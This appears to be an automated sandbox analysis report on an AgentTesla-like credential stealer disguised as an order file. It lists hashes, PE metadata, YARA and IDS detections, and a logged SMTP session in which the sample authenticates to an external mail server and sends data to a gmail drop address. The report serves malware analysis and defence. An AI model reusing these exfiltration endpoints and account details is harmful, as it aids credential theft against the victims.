SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.943555772188994
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	NEW ORDER 98540-0.exe
File size:	700'416 bytes
MD5:	df93e537cd7ba3dbc8fefe3e5aff9e0a
SHA1:	7a04c2ba75e5bacb7052388d0fe32b2ce3e0fc3b
SHA256:	7a20de1b4a4cd2e217be33f3297d2b38d7e7fd69ee216d58f0400160e41ff3ea
SHA512:	ef16fae1edae99dbeef552487fbdb22d3f8dba77c38b4ded71206f42db03dc88c62767c82bf56c57c96d3606b7963279b070b5c9ff79c2571343d58bdf8ff53c
SSDEEP:	12288:0KM9hCaVbvqZsX5HAT1dTrFATopt+O58/4g1E7nKG7eF:6UbZKgThpHS/4UEV7
TLSH:	36E42344BBAB0E83C83D52F95812648853F29662EA72D7CC3EC965D656CDFC9D7802C3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....z.e................................. ........@.. ....................................@................................

File Icon


Icon Hash:	6398a462a688d801

Static PE Info

General

Entrypoint:	0x4ab19a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x65F27AEB [Thu Mar 14 04:19:55 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xab140	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xac000	0x1864	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xae000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa91a0	0xa9200	d9a67f0429fc48ce5c5f14d4746cd088	False	0.9454106614929786	data	7.9521127631868005	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xac000	0x1864	0x1a00	c1eea787e3a7939dadba8b1bcf25825c	False	0.78125	data	6.932748187286618	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xae000	0xc	0x200	366542a7d751c8fec6b4c9bad26e53ba	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xac0e8	0x13f1	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9224289911851127
RT_GROUP_ICON	0xad4dc	0x14	data	1.05
RT_VERSION	0xad4f0	0x374	data	0.417420814479638

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
03/14/24-14:11:01.303269	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49712	587	192.168.2.6	50.87.139.143
03/14/24-14:11:01.303269	TCP	2839723	ETPRO TROJAN Win32/Agent Tesla SMTP Activity	49712	587	192.168.2.6	50.87.139.143

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 14, 2024 14:10:59.519423962 CET	49712	587	192.168.2.6	50.87.139.143
Mar 14, 2024 14:10:59.692925930 CET	587	49712	50.87.139.143	192.168.2.6
Mar 14, 2024 14:10:59.693248987 CET	49712	587	192.168.2.6	50.87.139.143
Mar 14, 2024 14:11:00.038501024 CET	587	49712	50.87.139.143	192.168.2.6
Mar 14, 2024 14:11:00.039494991 CET	49712	587	192.168.2.6	50.87.139.143
Mar 14, 2024 14:11:00.212977886 CET	587	49712	50.87.139.143	192.168.2.6
Mar 14, 2024 14:11:00.213937044 CET	49712	587	192.168.2.6	50.87.139.143
Mar 14, 2024 14:11:00.387805939 CET	587	49712	50.87.139.143	192.168.2.6
Mar 14, 2024 14:11:00.389084101 CET	49712	587	192.168.2.6	50.87.139.143
Mar 14, 2024 14:11:00.602931023 CET	587	49712	50.87.139.143	192.168.2.6
Mar 14, 2024 14:11:00.735173941 CET	587	49712	50.87.139.143	192.168.2.6
Mar 14, 2024 14:11:00.735585928 CET	49712	587	192.168.2.6	50.87.139.143
Mar 14, 2024 14:11:00.908824921 CET	587	49712	50.87.139.143	192.168.2.6
Mar 14, 2024 14:11:00.908883095 CET	587	49712	50.87.139.143	192.168.2.6
Mar 14, 2024 14:11:00.909151077 CET	49712	587	192.168.2.6	50.87.139.143
Mar 14, 2024 14:11:01.122982025 CET	587	49712	50.87.139.143	192.168.2.6
Mar 14, 2024 14:11:01.128714085 CET	587	49712	50.87.139.143	192.168.2.6
Mar 14, 2024 14:11:01.128923893 CET	49712	587	192.168.2.6	50.87.139.143
Mar 14, 2024 14:11:01.302237988 CET	587	49712	50.87.139.143	192.168.2.6
Mar 14, 2024 14:11:01.302421093 CET	587	49712	50.87.139.143	192.168.2.6
Mar 14, 2024 14:11:01.303268909 CET	49712	587	192.168.2.6	50.87.139.143
Mar 14, 2024 14:11:01.303344011 CET	49712	587	192.168.2.6	50.87.139.143
Mar 14, 2024 14:11:01.303388119 CET	49712	587	192.168.2.6	50.87.139.143
Mar 14, 2024 14:11:01.303421021 CET	49712	587	192.168.2.6	50.87.139.143
Mar 14, 2024 14:11:01.476583958 CET	587	49712	50.87.139.143	192.168.2.6
Mar 14, 2024 14:11:01.478482962 CET	587	49712	50.87.139.143	192.168.2.6
Mar 14, 2024 14:11:01.521078110 CET	49712	587	192.168.2.6	50.87.139.143
Mar 14, 2024 14:12:39.411992073 CET	49712	587	192.168.2.6	50.87.139.143
Mar 14, 2024 14:12:39.626343966 CET	587	49712	50.87.139.143	192.168.2.6
Mar 14, 2024 14:12:39.787209034 CET	587	49712	50.87.139.143	192.168.2.6
Mar 14, 2024 14:12:39.790537119 CET	49712	587	192.168.2.6	50.87.139.143
Mar 14, 2024 14:12:39.790664911 CET	49712	587	192.168.2.6	50.87.139.143
Mar 14, 2024 14:12:39.963713884 CET	587	49712	50.87.139.143	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 14, 2024 14:10:59.403865099 CET	52064	53	192.168.2.6	1.1.1.1
Mar 14, 2024 14:10:59.493290901 CET	53	52064	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 14, 2024 14:10:59.403865099 CET	192.168.2.6	1.1.1.1	0xcf81	Standard query (0)	mail.elec-qatar.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 14, 2024 14:10:59.493290901 CET	1.1.1.1	192.168.2.6	0xcf81	No error (0)	mail.elec-qatar.com		50.87.139.143	A (IP address)	IN (0x0001)	false

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Mar 14, 2024 14:11:00.038501024 CET	587	49712	50.87.139.143	192.168.2.6	220-box2248.bluehost.com ESMTP Exim 4.96.2 #2 Thu, 14 Mar 2024 07:10:59 -0600 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Mar 14, 2024 14:11:00.039494991 CET	49712	587	192.168.2.6	50.87.139.143	EHLO 960781
Mar 14, 2024 14:11:00.212977886 CET	587	49712	50.87.139.143	192.168.2.6	250-box2248.bluehost.com Hello 960781 [191.96.227.194] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Mar 14, 2024 14:11:00.213937044 CET	49712	587	192.168.2.6	50.87.139.143	AUTH login bW9oYW1tZWQuYWJyYXJAZWxlYy1xYXRhci5jb20=
Mar 14, 2024 14:11:00.387805939 CET	587	49712	50.87.139.143	192.168.2.6	334 UGFzc3dvcmQ6
Mar 14, 2024 14:11:00.735173941 CET	587	49712	50.87.139.143	192.168.2.6	235 Authentication succeeded
Mar 14, 2024 14:11:00.735585928 CET	49712	587	192.168.2.6	50.87.139.143	MAIL FROM:<mohammed.abrar@elec-qatar.com>
Mar 14, 2024 14:11:00.908883095 CET	587	49712	50.87.139.143	192.168.2.6	250 OK
Mar 14, 2024 14:11:00.909151077 CET	49712	587	192.168.2.6	50.87.139.143	RCPT TO:<jinhux31@gmail.com>
Mar 14, 2024 14:11:01.128714085 CET	587	49712	50.87.139.143	192.168.2.6	250 Accepted
Mar 14, 2024 14:11:01.128923893 CET	49712	587	192.168.2.6	50.87.139.143	DATA
Mar 14, 2024 14:11:01.302421093 CET	587	49712	50.87.139.143	192.168.2.6	354 Enter message, ending with "." on a line by itself
Mar 14, 2024 14:11:01.303421021 CET	49712	587	192.168.2.6	50.87.139.143	.
Mar 14, 2024 14:11:01.478482962 CET	587	49712	50.87.139.143	192.168.2.6	250 OK id=1rkkrN-00171u-0i
Mar 14, 2024 14:12:39.411992073 CET	49712	587	192.168.2.6	50.87.139.143	QUIT
Mar 14, 2024 14:12:39.787209034 CET	587	49712	50.87.139.143	192.168.2.6	221 box2248.bluehost.com closing connection

Target ID:	0
Start time:	14:10:55
Start date:	14/03/2024
Path:	C:\Users\user\Desktop\NEW ORDER 98540-0.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\NEW ORDER 98540-0.exe
Imagebase:	0xcc0000
File size:	700'416 bytes
MD5 hash:	DF93E537CD7BA3DBC8FEFE3E5AFF9E0A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2109019599.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2109019599.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:10:56
Start date:	14/03/2024
Path:	C:\Users\user\Desktop\NEW ORDER 98540-0.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\NEW ORDER 98540-0.exe
Imagebase:	0xf10000
File size:	700'416 bytes
MD5 hash:	DF93E537CD7BA3DBC8FEFE3E5AFF9E0A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3341066327.000000000323E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3341066327.0000000003246000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3338945387.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3338945387.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3341066327.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3341066327.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	7.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	102
Total number of Limit Nodes:	9

Executed Functions

Function 055CABA0 Relevance: 50.3, Strings: 37, Instructions: 4017
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

-, xrefs: 055CE0D8
5, xrefs: 055CEDAE
(, xrefs: 055CDA2A
C, xrefs: 055CC24C
+, xrefs: 055CC386
., xrefs: 055CDE5D
57, xrefs: 055CDBBC
C, xrefs: 055CC03D
0, xrefs: 055CB452
7, xrefs: 055CDBB2
7, xrefs: 055CC82D
<, xrefs: 055CC674
C, xrefs: 055CC45B
-, xrefs: 055CDCDF
<, xrefs: 055CC047
(, xrefs: 055CDA34
., xrefs: 055CDFAF
5, xrefs: 055CE57B
u, xrefs: 055CBE46
C, xrefs: 055CC66A
K, xrefs: 055CDCD5
+, xrefs: 055CBF68
+, xrefs: 055CC177
7, xrefs: 055CE416
7, xrefs: 055CD35F
7, xrefs: 055CCBFB
., xrefs: 055CDD83
7, xrefs: 055CD92D
., xrefs: 055CE17C
0, xrefs: 055CC58B
<, xrefs: 055CC256
\, xrefs: 055CE0CE
+, xrefs: 055CC595
7, xrefs: 055CD543
0, xrefs: 055CCCEF
<, xrefs: 055CC465
7, xrefs: 055CCA14

Memory Dump Source

Source File: 00000000.00000002.2110300848.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_55c0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID: ($($+$+$+$+$-$-$.$.$.$.$0$0$0$5$5$57$7$7$7$7$7$7$7$7$<$<$<$<$C$C$C$C$K$\$u
API String ID: 0-1901930981
Opcode ID: 5d9497d9aacc13ff4d083948cd4ba45ac2cc2d8780bf84687d87496c31dea278
Instruction ID: 1abe40b652c3b255198d685353c33468b0890aa7ec0555131b6e5f88bdba3e7c
Opcode Fuzzy Hash: 5d9497d9aacc13ff4d083948cd4ba45ac2cc2d8780bf84687d87496c31dea278
Instruction Fuzzy Hash: F3930570A017198FDB65EF78C854B99BBB2BF89300F5085EDD449AB350EB75AA81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 055CAB90 Relevance: 50.2, Strings: 37, Instructions: 3948
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

-, xrefs: 055CE0D8
5, xrefs: 055CEDAE
(, xrefs: 055CDA2A
C, xrefs: 055CC24C
+, xrefs: 055CC386
., xrefs: 055CDE5D
57, xrefs: 055CDBBC
C, xrefs: 055CC03D
0, xrefs: 055CB452
7, xrefs: 055CDBB2
7, xrefs: 055CC82D
<, xrefs: 055CC674
C, xrefs: 055CC45B
-, xrefs: 055CDCDF
<, xrefs: 055CC047
(, xrefs: 055CDA34
., xrefs: 055CDFAF
5, xrefs: 055CE57B
u, xrefs: 055CBE46
C, xrefs: 055CC66A
K, xrefs: 055CDCD5
+, xrefs: 055CBF68
+, xrefs: 055CC177
7, xrefs: 055CE416
7, xrefs: 055CD35F
7, xrefs: 055CCBFB
., xrefs: 055CDD83
7, xrefs: 055CD92D
., xrefs: 055CE17C
0, xrefs: 055CC58B
<, xrefs: 055CC256
\, xrefs: 055CE0CE
+, xrefs: 055CC595
7, xrefs: 055CD543
0, xrefs: 055CCCEF
<, xrefs: 055CC465
7, xrefs: 055CCA14

Memory Dump Source

Source File: 00000000.00000002.2110300848.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_55c0000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID: ($($+$+$+$+$-$-$.$.$.$.$0$0$0$5$5$57$7$7$7$7$7$7$7$7$<$<$<$<$C$C$C$C$K$\$u
API String ID: 0-1901930981
Opcode ID: c1477c8b919acc4069add207053150a3813011711710f1c73ade2a5f82dc6868
Instruction ID: 57cf4f800ca9efcab3f7238f0a1e6c08c93263cc51a0ab1219890960e9a2691b
Opcode Fuzzy Hash: c1477c8b919acc4069add207053150a3813011711710f1c73ade2a5f82dc6868
Instruction Fuzzy Hash: F5930570A017198FDB65EF78C854B99BBB2BF89300F5085EDD449AB350EB75AA81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 01377C02 Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2107576353.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1675164a681c8950c74f6021691562d9790c137bafb2c42fdcb1d9153b868d41
Instruction ID: 84e6442f012c32e9f607adf6f8cee81594be8a32408a4247cbc9add272e4401a
Opcode Fuzzy Hash: 1675164a681c8950c74f6021691562d9790c137bafb2c42fdcb1d9153b868d41
Instruction Fuzzy Hash: 2CD19F75A0122A8FDB24DF79D884AADB7F2BFC8314F118569D405EB358DB38AD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01378C70 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2107576353.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_NEW ORDER 98540-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d952831660a22b984c56789be64b43faefc5d6171b55f3719de1f6bea46a7b3
Instruction ID: aab0a2d0cc17e44ccd26491f11c2f1dd3c4c6e550a06d345eb1b97f74124743a
Opcode Fuzzy Hash: 5d952831660a22b984c56789be64b43faefc5d6171b55f3719de1f6bea46a7b3
Instruction Fuzzy Hash: 4B817D32F115258FD724DB69DC84A5EB7E3AFC8714F1A81A5E409EB366DE34EC018B80

Uniqueness

Uniqueness Score: -1.00%

Function 0137FCD8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0137FD56
GetCurrentThread.KERNEL32 ref: 0137FD93
GetCurrentProcess.KERNEL32 ref: 0137FDD0
GetCurrentThreadId.KERNEL32 ref: 0137FE29

Memory Dump Source

Source File: 00000000.00000002.2107576353.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_NEW ORDER 98540-0.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: db5c1c1b6fa3c998f82192ffadeff2829265e15c68ce089696fffc7c3931df07
Instruction ID: 6415a0e8e82774c58b62d9dcc5ede0af8ab6aacef15803b684f7619ee37f75af
Opcode Fuzzy Hash: db5c1c1b6fa3c998f82192ffadeff2829265e15c68ce089696fffc7c3931df07
Instruction Fuzzy Hash: 4D5156B090070ACFDB18CFAAD948B9EBBF5FF88318F208459D519A7360DB785944CB65

Uniqueness

Uniqueness Score: -1.00%

Function 055C45A5 Relevance: 1.6, APIs: 1, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 055C46C2

Memory Dump Source

Source File: 00000000.00000002.2110300848.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_55c0000_NEW ORDER 98540-0.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 8e248b1b403eb8e2f318eaced9f21752d30b298073fc2455d6df7a29545cba63
Instruction ID: 125b8ea4c9d2a74a4fd527a8395a87a4daded2bc93d60ed4384954037f5d702c
Opcode Fuzzy Hash: 8e248b1b403eb8e2f318eaced9f21752d30b298073fc2455d6df7a29545cba63
Instruction Fuzzy Hash: 2C51CCB1D00249DFDF14CF99C994ADEBFB6BF48310F24826AE819AB210D7749885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 055C45B0 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 055C46C2

Memory Dump Source

Source File: 00000000.00000002.2110300848.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_55c0000_NEW ORDER 98540-0.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 566f48addaf33e8aa54f0df31163c3105cd81a2a3088db1c20c017509477222a
Instruction ID: 64c12dc963510cff5251b1b34a51bdb23eb206a6a13efddbf601a8ddf0aeefcf
Opcode Fuzzy Hash: 566f48addaf33e8aa54f0df31163c3105cd81a2a3088db1c20c017509477222a
Instruction Fuzzy Hash: AE41BCB1D00249DFDF14CF9AC994ADEBFB5BF48310F24816AE819AB210D775A885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 013758ED Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 013759A9

Memory Dump Source

Source File: 00000000.00000002.2107576353.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_NEW ORDER 98540-0.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 87d6281f97285831fb90ce027e475915cf754def98984b53da5f87f7877b34bd
Instruction ID: 6ab9e555fc1d33ba7ec3d13c3ec63b83657ec17040e56206305284d38b3eccfe
Opcode Fuzzy Hash: 87d6281f97285831fb90ce027e475915cf754def98984b53da5f87f7877b34bd
Instruction Fuzzy Hash: F341E0B0C0071DCFEB25DFAAC984B9EBBB5BF89304F20816AD408AB251DB755946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 055C2A64 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 055C6C41

Memory Dump Source

Source File: 00000000.00000002.2110300848.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_55c0000_NEW ORDER 98540-0.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 3e9edacf1cb22a100b891ffc60cc54d99694403f9f2d3ef5dcc2d20892620b09
Instruction ID: 7ba3502021c10741112aa9b652a6ebedc2329097fb220383c4f2d8ddc2b39f5f
Opcode Fuzzy Hash: 3e9edacf1cb22a100b891ffc60cc54d99694403f9f2d3ef5dcc2d20892620b09
Instruction Fuzzy Hash: EB41F9B5900305DFDB14CF99C888AAABBF5FF88314F24849DD519AB321D775A941CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 013744F0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 013759A9

Memory Dump Source

Source File: 00000000.00000002.2107576353.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_NEW ORDER 98540-0.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 3d974f358277127b89bbbafcf47d71f966b0953f9fc1dfb2a96b52681f958c2b
Instruction ID: cdd8a3f1dac5a7063e152a1932555e438bc0d9b511cf2d5e9dc2ff01b9cbdb64
Opcode Fuzzy Hash: 3d974f358277127b89bbbafcf47d71f966b0953f9fc1dfb2a96b52681f958c2b
Instruction Fuzzy Hash: FE41E470C0071DCBEB25DFAAC984B9EBBF5BF89704F20806AD418AB251DB756945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 055C001A Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 055C00C7

Memory Dump Source

Source File: 00000000.00000002.2110300848.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false

Joe Sandbox IDA Plugin

